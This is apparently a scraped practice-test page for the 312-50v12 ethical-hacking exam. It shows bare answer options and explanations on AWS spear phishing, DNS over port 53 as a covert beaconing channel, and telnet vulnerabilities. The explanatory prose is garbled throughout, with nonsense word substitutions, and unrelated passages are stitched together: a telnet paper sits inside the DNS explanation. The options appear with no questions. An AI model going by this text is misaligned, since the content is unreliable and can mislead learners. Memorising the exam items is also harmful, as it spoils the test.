312-50v12 Practice Test

Run a network sniffer and capture the returned traffic with the configuration file from the
router

Send a customized SNMP set request with a spoofed source IP address in the range -
192.168.1.0

Social engineering

Explanation:
Just like any other service that accepts usernames and passwords for logging in, AWS
users are vulnerable to social engineering attacks from attackers. fake emails, calls, or any
other method of social engineering, may find yourself with an AWS users’ credentials within
the hands of an attacker.
If a user only uses API keys for accessing AWS, general phishing techniques could still use
to gain access to other accounts or their pc itself, where the attacker may then pull the API
keys for aforementioned AWS user.
With basic opensource intelligence (OSINT), it’s usually simple to collect a list of workers of
an organization that use AWS on a regular basis. This list will then be targeted with spear
phishing to do and gather credentials. an easy technique may include an email that says
your bill has spiked 500th within the past 24 hours, “click here for additional information”,
and when they click the link, they’re forwarded to a malicious copy of the AWS login page
designed to steal their credentials.
An example of such an email will be seen within the screenshot below. it’s exactly like an
email that AWS would send to you if you were to exceed the free tier limits, except for a
few little changes. If you clicked on any of the highlighted regions within the screenshot,
you’d not be taken to the official AWS web site and you’d instead be forwarded to a pretend
login page setup to steal your credentials.
These emails will get even more specific by playing a touch bit additional OSINT before
causing them out. If an attacker was ready to discover your AWS account ID on-line
somewhere, they could use methods we at rhino have free previously to enumerate what
users and roles exist in your account with none logs contact on your side. they could use
this list to more refine their target list, further as their emails to reference services they will
know that you often use.
For reference, the journal post for using AWS account IDs for role enumeration will be
found here and the journal post for using AWS account IDs for user enumeration will be
found here.
During engagements at rhino, we find that phishing is one in all the fastest ways for us to
achieve access to an AWS environment.

The right most portion of the hash is always the same

4.0-6.9

Port 53

Explanation:
DNS uses Ports 53 which is almost always open on systems, firewalls, and clients to
transmit DNS queries. instead of the more familiar Transmission Control Protocol (TCP)
these queries use User Datagram Protocol (UDP) due to its low-latency, bandwidth and
resource usage compared TCP-equivalent queries. UDP has no error or flow-control
capabilities, nor does it have any integrity checking to make sure the info arrived intact.How
is internet use (browsing, apps, chat etc) so reliable then? If the UDP DNS query fails (it’s a
best-effort protocol after all) within the first instance, most systems will retry variety of times
and only after multiple failures, potentially switch to TCP before trying again; TCP is
additionally used if the DNS query exceeds the restrictions of the UDP datagram size –
typically 512 bytes for DNS but can depend upon system settings.Figure 1 below illustrates
the essential process of how DNS operates: the client sends a question string (for example,
mail.google[.]com during this case) with a particular type – typically A for a number
address. I’ve skipped the part whereby intermediate DNS systems may need to establish
where ‘.com’ exists, before checking out where ‘google[.]com’ are often found, and so on.
Many worms and scanners are created to seek out and exploit systems running telnet.
Given these facts, it’s really no surprise that telnet is usually seen on the highest Ten
Target Ports list. Several of the vulnerabilities of telnet are fixed. They require only an
upgrade to the foremost current version of the telnet Daemon or OS upgrade. As is usually
the case, this upgrade has not been performed on variety of devices. this might flow from to
the very fact that a lot of systems administrators and users don’t fully understand the risks
involved using telnet. Unfortunately, the sole solution for a few of telnets vulnerabilities is to
completely discontinue its use. the well-liked method of mitigating all of telnets
vulnerabilities is replacing it with alternate protocols like ssh. Ssh is capable of providing
many of an equivalent functions as telnet and a number of other additional services typical
handled by other protocols like FTP and Xwindows. Ssh does still have several drawbacks
to beat before it can completely replace telnet. it’s typically only supported on newer
equipment. It requires processor and memory resources to perform the info encryption and
decryption. It also requires greater bandwidth than telnet thanks to the encryption of the info . This paper was written to assist clarify how dangerous the utilization of telnet are
often and to supply solutions to alleviate the main known threats so as to enhance the
general security of the web
Once a reputation is resolved to an IP caching also helps: the resolved name-to-IP is
usually cached on the local system (and possibly on intermediate DNS servers) for a period
of your time . Subsequent queries for an equivalent name from an equivalent client then
don’t leave the local system until said cache expires. Of course, once the IP address of the
remote service is understood , applications can use that information to enable other TCPbased
protocols, like HTTP, to try to to their actual work, for instance ensuring internet cat
GIFs are often reliably shared together with your colleagues.So, beat all, a couple of dozen
extra UDP DNS queries from an organization’s network would be fairly inconspicuous and
will leave a malicious payload to beacon bent an adversary; commands could even be
received to the requesting application for processing with little difficulty.